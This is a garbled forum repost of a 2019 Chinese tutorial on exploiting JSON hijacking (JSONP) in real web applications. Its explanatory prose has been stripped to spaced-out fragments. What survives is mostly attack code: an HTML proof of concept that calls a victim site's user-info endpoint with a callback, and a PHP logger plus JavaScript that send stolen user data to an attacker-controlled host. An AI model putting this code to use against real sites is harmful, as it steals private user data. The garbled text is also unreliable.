搜索

[13708] 2019-01-28_小学生都会挖掘的JSONHijacking实战利用

文档创建者:s7ckTeam
浏览次数:33
最后更新:2025-01-18
2019-01-28_小学生都会挖掘的JSONHijacking实战利用 J S O N   H i j a c k i n g z h u k a i a n g 7   F r e e B u f   2 0 1 9 - 0 1 - 2 8 J S O N   H i j a c k i n g C S R F j s o n 0 × 0 1 b u r p s u i t e H i s t o r y j s o n I d 0 × 0 2 p o c p o c P O C t x f ( { " d a t a " : { " n a m e " : " " } } ) ; < h t m l > < h e a d > < s c r i p t > f u n c t i o n   t x f ( a ) { a l e r t ( a . d a t a . n a m e ) ; } < / s c r i p t > < s c r i p t   s r c = h t t p : / / * * * . * * * . * * / w m / U s e r / g e t U s e r I n f o ? c a l l b a c k = t x f > < / s c r i p t > < / b o d y > < / h t m l >
0 × 0 3 1 . w e b p h p s t u d y h t t p : / / . . * * * / . h t m l Q Q h a c k o n e 0 × 0 4 1 . R e f e r e r R e f e r e r j s o n . p h p < ? p h p $ n i c k n a m e = $ _ G E T [ ' n a m e ' ] ; $ f p   =   f o p e n ( ' i n f o . t x t ' , ' a ' ) ; $ f l a g   =   f w r i t e ( $ f p ,   " :     " . $ n a m e . " r n " ) ; ? > < h t m l > . h t m l < h e a d >         < t i t l e > t x f < / t i t l e > < s c r i p t >         v a r   x m l h t t p ;         f u n c t i o n   t x f ( a )         {         x m l h t t p = n e w   X M L H t t p R e q u e s t ( )         v a r   x = " h t t p : / / * * * . * * * . * * * / j s o n . p h p ? n a m e = " + a . d a t a . n a m e ;     x m l h t t p . o p e n ( " G E T " ,   x ,   t r u e ) ;       x m l h t t p . s e n d ( ) ;   } < / s c r i p t > > < s c r i p t   s r c = h t t p : / / * * * . * * * . * * * ? c a l l b a c k = t x f > < / s c r i p t > < / h e a d > < b o d y >       < t e x t a r e a > < / t e x t a r e a > > < / b o d y > < / h t m l >
2 . t o k e n t o k e n t o k e n 3 . 西 * z h u k a i a n g 7 F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理